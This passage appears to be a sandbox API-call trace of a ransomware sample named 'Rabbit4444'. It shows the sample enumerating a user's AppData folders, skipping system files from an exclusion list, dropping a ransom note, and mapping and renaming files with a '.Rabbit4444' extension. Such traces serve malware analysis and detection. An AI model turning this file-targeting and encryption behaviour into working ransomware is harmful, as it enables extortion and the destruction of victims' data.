lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77c3f1ef, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x77c3f1ef, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xeabf77a8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0056.081] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.081] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.081] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0056.081] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.081] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77c3f1ef, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x77c3f1ef, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xeabf77a8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.082] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.082] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.082] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0056.082] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.082] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.082] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeabf77a8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeabf77a8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeabf77a8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0056.082] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.082] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0056.082] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeabf77a8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeabf77a8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeabf77a8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0056.082] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0056.082] lstrcpyW (in: lpString1=0x130ebe8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0056.082] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0056.082] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0056.082] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0056.083] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.083] CloseHandle (hObject=0x278) returned 1 [0056.083] CloseHandle (hObject=0x27c) returned 1 [0056.083] GetCurrentThreadId () returned 0xd98 [0056.083] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122128 [0056.083] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings" [0056.083] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ec8 | out: hHeap=0xe0000) returned 1 [0056.083] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0056.083] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings" [0056.083] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\" [0056.083] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" [0056.083] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0056.086] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0056.089] FlushFileBuffers (hFile=0x27c) returned 1 [0056.090] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0056.090] CloseHandle (hObject=0x27c) returned 1 [0056.091] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings") returned 82 [0056.091] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.091] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c13db32, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x713d778b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xeac1d9fc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0056.091] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.091] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.091] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0056.091] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.091] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c13db32, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x713d778b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xeac1d9fc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.091] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.091] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.091] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0056.091] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.091] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.091] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeabf77a8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeabf77a8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeac1d9fc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0056.091] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.091] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0056.091] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c13db32, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x9c13db32, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x9c13db32, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0056.091] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0056.091] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.091] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0056.091] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0056.091] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0056.091] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0056.091] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0056.091] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0056.091] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0056.092] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0056.092] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0056.092] lstrcpyW (in: lpString1=0x130ebde, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0056.092] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0056.092] lstrlenW (lpString="roaming.lock") returned 12 [0056.092] lstrlenW (lpString="Rabbit4444") returned 10 [0056.092] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0056.093] lstrlenW (lpString=".dll") returned 4 [0056.093] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0056.093] lstrlenW (lpString=".lnk") returned 4 [0056.093] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0056.093] lstrlenW (lpString=".ini") returned 4 [0056.093] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0056.093] lstrlenW (lpString=".sys") returned 4 [0056.093] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0056.093] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c13db32, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x77c3f1ef, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xdaed6159, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0056.093] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0056.093] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.093] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0056.093] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0056.093] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0056.093] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0056.093] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0056.093] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0056.093] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0056.093] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0056.093] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0056.093] lstrcpyW (in: lpString1=0x130ebde, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0056.093] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0056.093] lstrlenW (lpString="settings.dat") returned 12 [0056.093] lstrlenW (lpString="Rabbit4444") returned 10 [0056.093] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0056.093] lstrlenW (lpString=".dll") returned 4 [0056.093] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0056.093] lstrlenW (lpString=".lnk") returned 4 [0056.094] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0056.094] lstrlenW (lpString=".ini") returned 4 [0056.094] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0056.094] lstrlenW (lpString=".sys") returned 4 [0056.094] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0056.094] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.094] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.094] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14740462662) returned 1 [0056.094] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0056.094] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0056.094] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0056.094] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x298 [0056.095] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0056.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0056.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0056.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0056.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0056.098] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14740831499) returned 1 [0056.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0056.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0056.098] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.098] CloseHandle (hObject=0x298) returned 1 [0056.098] CloseHandle (hObject=0x278) returned 1 [0056.098] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444") returned 106 [0056.098] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0056.098] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xdac99df7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdac99df7, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xdac99df7, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0056.099] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0056.099] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.099] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="Rabbit4444.exe") returned 1 [0056.099] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".") returned 1 [0056.099] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="..") returned 1 [0056.099] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="windows") returned -1 [0056.099] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="bootmgr") returned 1 [0056.099] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="pagefile.sys") returned 1 [0056.099] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="boot") returned 1 [0056.099] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="ids.txt") returned 1 [0056.099] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="NTUSER.DAT") returned 1 [0056.099] lstrcpyW (in: lpString1=0x130ebde, lpString2="settings.dat.LOG1" | out: lpString1="settings.dat.LOG1") returned="settings.dat.LOG1" [0056.099] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\settings.dat.LOG1", dwFileAttributes=0x22) returned 1 [0056.100] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\settings.dat.LOG1", dwFileAttributes=0x6) returned 1 [0056.100] lstrlenW (lpString="settings.dat.LOG1") returned 17 [0056.100] lstrlenW (lpString="Rabbit4444") returned 10 [0056.100] lstrcmpiW (lpString1="s.dat.LOG1", lpString2="Rabbit4444") returned 1 [0056.100] lstrlenW (lpString=".dll") returned 4 [0056.100] lstrcmpiW (lpString1="LOG1", lpString2=".dll") returned 1 [0056.100] lstrlenW (lpString=".lnk") returned 4 [0056.100] lstrcmpiW (lpString1="LOG1", lpString2=".lnk") returned 1 [0056.100] lstrlenW (lpString=".ini") returned 4 [0056.100] lstrcmpiW (lpString1="LOG1", lpString2=".ini") returned 1 [0056.100] lstrlenW (lpString=".sys") returned 4 [0056.100] lstrcmpiW (lpString1="LOG1", lpString2=".sys") returned 1 [0056.100] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\settings\\settings.dat.log1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.100] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.100] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14741106563) returned 1 [0056.100] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0056.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0056.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0056.100] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x298 [0056.102] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0056.103] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.103] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0056.103] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.103] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0056.103] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.103] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0056.103] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.103] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0056.103] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14741405885) returned 1 [0056.103] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0056.103] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0056.103] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.104] CloseHandle (hObject=0x298) returned 1 [0056.104] CloseHandle (hObject=0x278) returned 1 [0056.104] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\settings.dat.LOG1.Rabbit4444") returned 111 [0056.104] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\settings\\settings.dat.log1"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\settings.dat.LOG1.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\settings\\settings.dat.log1.rabbit4444"), dwFlags=0x1) returned 1 [0056.104] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xdacc005c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdacc005c, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xdacc005c, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0056.104] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0056.104] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.104] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="Rabbit4444.exe") returned 1 [0056.104] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".") returned 1 [0056.104] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="..") returned 1 [0056.104] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="windows") returned -1 [0056.104] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="bootmgr") returned 1 [0056.104] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="pagefile.sys") returned 1 [0056.104] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="boot") returned 1 [0056.105] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="ids.txt") returned 1 [0056.105] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="NTUSER.DAT") returned 1 [0056.105] lstrcpyW (in: lpString1=0x130ebde, lpString2="settings.dat.LOG2" | out: 